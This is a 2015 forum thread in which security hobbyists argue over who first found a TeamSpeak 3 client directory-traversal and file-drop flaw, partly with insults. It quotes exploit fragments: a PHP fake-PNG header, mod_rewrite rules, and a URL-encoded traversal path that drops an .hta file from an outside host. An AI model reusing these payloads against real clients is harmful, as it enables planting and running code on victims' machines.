TeamSpeak 3 RFI RCE Directory Traversal vulnerability / exploit

[Asphyxia]

Note: Sit back and relax while reading through this thread, enjoy some popcorn maybe.

The TeamSpeak 3 exploit being published by "scurippio" (attention whore) is documented on many websites, he spammed them into kiddie exploit databases. On behalf of all the R4P3 researchers, that is irritating to us. We spent days of teamwork from the first discovery of this caching system issue to the full disclosure we did. We had this exploited successfully in early September (2015). No one else had any mentioning of this issue at that point in time. Most importantly, we would like our purpose to be known --- our one and only goal is to make TeamSpeak 3 safer for people by discovering security issues to be patched. So, you might ask why we even publish anything? We enjoy educating people on security, it is fun for us to teach people, see this: http://artofproblemsolving.com/articles/learning-through-teaching

The security issue was then leaked by one of our internal researchers. At that point in time we chose to offer up a full disclosure announcement which we pretty much explained how it works and any 13 year old script-kiddie could have stolen the information we provided to recreate the exploit (which is what apparently happened) --- what professional steals vulnerability findings? You're cool, man(.)

Most importantly scurippio, your published documentation on the exploit demonstrates you are a self-proclaimed black hat hacker, hah.

APPLICATIONNAME="OwnedByScurippio"

To conclude, R4P3 believes the TeamSpeak development team has acted appropriately in response to our full disclosure and thankfully they treated this security issue with seriousness to prevent script kiddies like scurippio from "owning" computer systems. WE ARE PROUD TO SAY THAT IF YOU UPDATE TO THE LATEST VERSION OF TEAMSPEAK 3, YOU ARE MUCH SAFER.

I would like to add that this is a REMOTE FILE INCLUSION and DIRECTORY TRAVERSAL attack, not a REMOTE CODE EXECUTION attack like Scurippio mentioned. There are many security issues working together here. The biggest security issue is the way Microsoft Windows systems handle Startup files and their creation... if your Startup folder was appropriately secured, this issue would be less concerning. TeamSpeak itself did not have a RCE (Remote Code Execution) vulnerability/exploit. The Windows system itself is just so weak that without appropriate authorization, a startup file was placed. I would consider this a dropper attack, definitely not a RCE though.

 

[Derp]

Basically
This is what We are dealing with

www.zone-h.org/archive/notifier=scurippio
(Hope I'm not wrong)
This is sad

 

[Asphyxia]

I like Dante696 a little more today, +REP --- he called out Scurippio for claiming the exploit is not his. I think Dante deserves a hug, guys.

http://forum.teamspeak.com/threads/120981-0day-exploit-in-client-3-0-0-3-0-18-1?p=421579#post421579

I can not answer for devs or management and their decisions.
But i'm glad that we do not wait till 3.0.19 is ready te become a stable client.

About the exploit:
It wasn't exactly yours, but the result was the same.
We are still glad that your did report it to us. So we could could test if this also was fixed in latest beta release.

About the early release:
Some devs can not sleep at night.
There will be ***maybe*** more who report such exploit and we think not all will wait till we release a fixed version.
So we do it now instead of later.

 

[Derp]

http://seclists.org/bugtraq/2015/Oct/104

Copyright (c) 2015 Scurippio

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

...

 

[User_418]

Can you publish any way to protect a client and/or server from that?

 

[Bodiga]

"To conclude, R4P3 believes the TeamSpeak development team has acted appropriately in response to our full disclosure and thankfully they treated this security issue with seriousness to prevent script kiddies like scurippio from "owning" computer systems."

hey I know that name, he find the exploit 1 year ago, he talk about his exploit in a conference they have proof about this i think and I think he don't know this site at all... and if he spread this is only for an anti-lamering measure
so stop raging like a kid, if you have a vulnerabilty you must spot that and don't cry when others spot the same... and I think you don't check the date on zone-h (2005, 10 year agò ... ) scurippio's exploits are in the blackmarket not only for teamspeak .... and this is the first scurippio's adv i see public on web honestly.. (0day for six hour).

I have read the adv, he don't mention the rce is regarding teamspeak but he can reach that using teamspeak as a vector read better...
mb you need more information about talk on that. the title is: rfi/directory traversal ___TO___ rce! that not implies the rce is in teamspeak!

 

[Derp]

so stop raging like a kid, if you have a vulnerabilty you must spot that and don't cry when others spot the same... and I think you don't check the date on zone-h (2005, 10 year agò ... ) scurippio's exploits are in the blackmarket not only for teamspeak .... and this is the first scurippio's adv i see public on web honestly.. (0day for six hour).

I have read the adv, he don't mention the rce is regarding teamspeak but he can reach that using teamspeak as a vector read better...
mb you need more information about talk on that. the title is: rfi/directory traversal ___TO___ rce! that not implies the rce is in teamspeak!

"but he can reach that using teamspeak as a vector "

Not mentioned anywhere

his words were

The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code
execution.

---------------------------------------------------
As for the Report


In his "ADV" he says

The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response
is a real image, but you can easily bypass this control and put your exploit payload.

<?php
header ('Content-type: image/png');
echo "\211PNG\r\n\032\n";
?>

That is PLAIN WRONG,

He says he's tricking the image fetcher to make it download a file, that's not correct, the image fetcher NEVER checks the content, Teamspeak does the check once the file gets downloaded,

He's also saying

Example:

RewriteEngine On
RewriteCond %{REQUEST_URI} !/faker.php
RewriteRule .* /faker.php

Which is also WRONG, As the ImageFetcher doesn't accept "Rewriting" (It will basically return a BAD Request error, even if you force an ERROR 200 State)

----------------------------------------------
Why am I writing this?

I'm writing this because We (the R4P3 DEV Team) worked very hard on this, Even after the data breach, this was under control but we still decided to release it. And now, someone else is getting the credits, this is NOT how it works

If Scurippio can prove that he found this 1 year ago then, I invite him to register on the forum and post a reply in this thread, where he Provides Proof that he found this 1 year ago

In Conclusion

We have nothing personal with Scurippio, If he can prove that He found the RFI and Successfuly exploited it first, we will be happy to give him credits too

-Derp

 

[Bodiga]

wait derp! test better your stuff plz.

I have tested the exploit and it work perfect on 3.0.18.1 and prior version!

1. Teamspeak (3.0.18.1)Decodes the string and AFTER doing that it checks for ../
2. Teamspeak (3.0.18.1)then controls if invalid extensions are present in the URL, BEFORE doing any further action

Not true dude! test it! the exploit work like a charm the client don't check nothing url encoded.
and you can forge ,vbs, pif, scr, the only ext checked is , bat ,com and exe.

(It will basically return a BAD Request error, even if you force an ERROR 200 State)

Absolutley no! have you try it on apache? use the same rule on .htaccess don't use [r,l=200] use scurippo's example and it work perfectly!

, As the ImageFetcher doesn't accept "Rewriting"

The url rewrite is fully trasparent, the image-fetcher can't see the difference... from 200 real resource or 200 rewrited by mod_rewrite on apache!

The image fetcher check the content-type and the image header! have you tested the exploit? are you sure?

I will write to scurippio an email , he can talk better about that.

Not mentioned anywhere:
read better...

"but he can reach that using teamspeak as a vector "

oh yes: " and in my test case on "Windows" you can reach remote code execution, "
he not say ts3 has rce bug!

stop spread false information about this vulnerability.

btw, as I can see in your post.. I think you never see that vulnerabilty before the scurippio adv/release....

 

[Derp]

wait derp! test better your stuff plz.

I have tested the exploit and it work perfect on 3.0.18.1 and prior version!


Not true dude! test it! the exploit work like a charm the client don't check nothing url encoded.
and you can forge ,vbs, pif, scr, the only ext checked is , bat ,com and exe.



Absolutley no! have you try it on apache? use the same rule on .htaccess don't use [r,l=200] use scurippo's example and it work perfectly!



The url rewrite is fully trasparent, the image-fetcher can't see the difference... from 200 real resource or 200 rewrited by mod_rewrite on apache!

The image fetcher check the content-type and the image header! have you tested the exploit? are you sure?

I will write to scurippio an email , he can talk better about that.

Not mentioned anywhere:
read better...

"but he can reach that using teamspeak as a vector "

oh yes: " and in my test case on "Windows" you can reach remote code execution, "
he not say ts3 has rce bug!

stop spread false information about this vulnerability.

I did a second check

It turns out the exploit works on 3.0.18.1

I apologise for my "disinformation" (I didn't see the %5c part)
As for the rest of the post

1. The Rewrite Method
I'll let @Asphyxia talk about that,

2. The ImageFetcher

The image fetcher check the content-type and the image header! have you tested the exploit? are you sure?

That is actually not true,
Try downloading a .rar archive using the IMG tag, monitor your %appdata%/TS3Client/cache/remote folder
The file gets downloaded, Teamspeak then checks the file's content and if it doesn't detect it as a valid image, it NullBytes it

 

[Bodiga]

I did a second check

It turns out the exploit works on 3.0.18.1

I apologise for my "disinformation" (I didn't see the %5c part)
As for the rest of the post

1. The Rewrite Method
I'll let @Asphyxia talk about that,

You can trust me dude! tested , and i have worked with rewrite for years

2. The ImageFetcher

That is actually not true,
Try downloading a .rar archive using the IMG tag, monitor your %appdata%/TS3Client/cache/remote folder
The file gets downloaded, Teamspeak then checks the file's content and if it doesn't detect it as a valid image, it NullBytes it

Ye is 0byte file, becouse they check the file header signature, if you put the right header (check scurippio's example) you can fill the file with arbitrary data.

so is actually true.

btw Are you sure your security team has spotted the same vulnerability? reading your posts seems you dont' know the details on that exploit/vulnerability

 

[Derp]

Ye is 0byte file, becouse they check the file header signature, if you put the right header (check scurippio's example) you can fill the file with arbitrary data.

so is actually true.

You're right, but that is not being handled by the Image Fetcher, (If that's what you meant)
The check is being done AFTER the file is being downloaded, NOT Before

Edit: Can you please ask Scurippio to register on the forums and start a Private Conversation about this with the rest of the DevTeam?

 

[Derp]

You can trust me dude! tested , and i have worked with rewrite for years

I didn't work on the Rewrite Method, this is why I'm not saying anything about it, Instead I'll let
@Asphyxia
talk about it.

and i have worked with rewrite for years

Noone said you didn't have any experience in rewrite

 

[Bodiga]

Ok! I will try to send an email to scurippio, (I really don't know this guy and I'm not in "confidence" with him but I have see him only one time at an international event (ccc), so idk if he respond to me, let me try! )

The check is being done AFTER the file is being downloaded, NOT Before

Attach ida pro, you can see this check is Before...
ts check content-type, header, and if the condition is true it will start download.

4 post , 4 technical error about this exploit I really think you and your team never deal with this vulnerabilty and never see that before the public release... and you call others "script kiddies?"

the fun part of this post is that:

"our one and only goal is to make TeamSpeak 3 safer for people by discovering security issues to be patched. So, you might ask why we even publish anything? We enjoy educating people on security, it is fun for us to teach people, see this: http://artofproblemsolving.com/articles/learning-through-teaching

The security issue was then leaked by one of our internal researchers."

1. Seems your team don't have tested that vulns, your consideration are full of errors
2. If you want claim a security research as scurippio have done or help others, you must release the info to the public, not say that excuse... this result so "script kiddies" , "it is fun for us to teach people" for other people the it security is a real deal not a fun fact so deal with it.
3. Is too simple now claim that is an your research leaked, and in the fact that apparently not becouse you don't tested nothing and spreading fasle info around that full of errors.

 

[Asphyxia.Cell]

For some reason you sound too much like a fan of S to come here and tell us what he found and what we did not find. Given that our community is home to tens (and many more undocumented) of security findings in regards to our favorite software, I can confidently vouch for my team in stating that we indeed were the first to document this security issue unless proven otherwise.

If this security issue was found over a year ago and discussed at a conference it would already be wild. My response to you is kindly to fuck off and quit challenging my team. We don't have to prove anything more to you, the burden is on the other end. We know that the JPEG "y0" header or other types is required at the top of the file. It looks like S made the attack as a follow up to the first hotfix --- why is that? Because he encoded the URL when that was unnecessary in the first attack.

Just because you can use IDA cracked that you downloaded from some Hack Forums post does not qualify you to judge whether we did or did not find this security issue first. You speak too much like you know him more than seeing him just once.

You are probably a friend of his or maybe even more. Just don't come here stepping on toes, because we have no respect for the black attitude.

In addition, mod_rewrite may work. I only tried htacc and changing the header with PHP (200), that was not working --- so we found it to work perfectly fine with an FTP server. Thanks to Kap for working with the FTP side of things. The client kept logging errors, 302 if I remember correctly while every other browser returned a 200. We may not be the best team in the world, but we definitely make things work or make things break when we combine our skills.

 

[Derp]

1. Seems your team don't have tested that vulns, your consideration are full of errors
2. If you want claim a security research as scurippio have done or help others, you must release the info to the public, not say that excuse... this result so "script kiddies" , "it is fun for us to teach people" for other people the it security is a real deal not a fun fact so deal with it.
3. Is too simple now claim that is an your research leaked, and in the fact that apparently not becouse you don't tested nothing and spreading fasle info around that full of errors.

You keep saying that our report is full of errors, but you are not providing any proof of that.

You're basically saying that we are wrong just because you're saying it works in a different way, Which doesn't make sense

Could you please provide proof that actually proves that you're right?

 

[Bodiga]

....

Just because you can use IDA cracked that you downloaded from some Hack Forums post does not qualify you to judge whether we did or did not find this security issue first. You speak too much like you know him more than seeing him just once.

And if I have a cracked IDA my skill change? seems legit...
btw I have paid for that
and I'm not a fun, just talk about that becouse I found that post googling around that, and not any conference out of there are public... sorry dude

You are probably a friend of his or maybe even more. Just don't come here stepping on toes, because we have no respect for the black attitude.

unfortunately no! sorry!

In addition, mod_rewrite may work. I only tried htacc and changing the header with PHP (200), that was not working --- so we found it to work perfectly fine with an FTP server. Thanks to Kap for working with the FTP side of things. The client kept logging errors, 302 if I remember correctly while every other browser returned a 200. We may not be the best team in the world, but we definitely make things work or make things break when we combine our skills.

and for you

You keep saying that our report is full of errors, but you are not providing any proof of that.

You're basically saying that we are wrong just because you're saying it works in a different way, Which doesn't make sense

Could you please provide proof that actually proves that you're right?

Random members on facepunch can also prove, becouse they tested the scurippio's exploit like me,
https://facepunch.com/showthread.php?t=1490990

That demostrate alot about you and your team dude.

 

[Derp]

And if I have a cracked IDA my skill change? seems legit...
btw I have paid for that
and I'm not a fun, just talk about that becouse I found that post googling around that,

unfortunately no! sorry!

and for you


Random members on facepunch can also prove, becouse they tested the scurippio's exploit like me,
https://facepunch.com/showthread.php?t=1490990

That demostrate alot about you and your team dude.

Oh, Well, I only see 2 posts

One is saying "<3 you ts and your exploits"

And the second one is basically a copy paste what Scurippio wrote in his report, which I already talked about

"Not demonstrating much afterall don't you think?"

 

[Bodiga]

Dude plz ,

read better...
from facepunch post...
If you can't test correctly is your lack of knowledge

https://facepunch.com/showthread.php?t=1490990

Edited:

Test file for anyone who wants to test it: http://shodan.me/teamspeak.hta
You can put anything between the / and teamspeak and it will work. For example:
http://shodan.me/%2e%2e%5c%2e%2e%5c%...cteamspeak.hta

That should make a file on your desktop called teamspeak.hta. The file is harmless it just launches calculator:

now the hoster put down the host. if you really need
and if you don't belive to me or facepunch random members
wait the exploit-db confirmation it's in pending to verify,
I have tested myself and others to

https://www.exploit-db.com/

btw. any publication on bugtraq and packetstorm are already verifyed

https://packetstormsecurity.com/files/134050/TS3Client-3.0-3.0.18.1.txt
http://seclists.org/bugtraq/2015/Oct/101

I think you can't test this exploit becouse your lack of knowledge.
and that totally confirm this is not your /your team exploit/research...

 

[ehthe]

This isn't getting anywhere. The exploit is a simple directory traversal. Why bother debate on it. It's fixed guys !

 

[Derp]

That's something I already talked about

Once Again, that post is not demonstrating anything, It's just saying, Hey "Scurippio's exploit is working"
And this is not what we are talking about, We know it's working, We are talking about the "INFO" he provided

The Way the ImageFetcher works, the way the Rewrite module gets implemented to make the exploit work

None of the two is being mentioned in that post.

Edit: This conversation is getting too far, I won't respond to any further responses in this thread,
As I said in the earlier posts, I invite Scurippio to register on the forums and start a private conversation

-Derp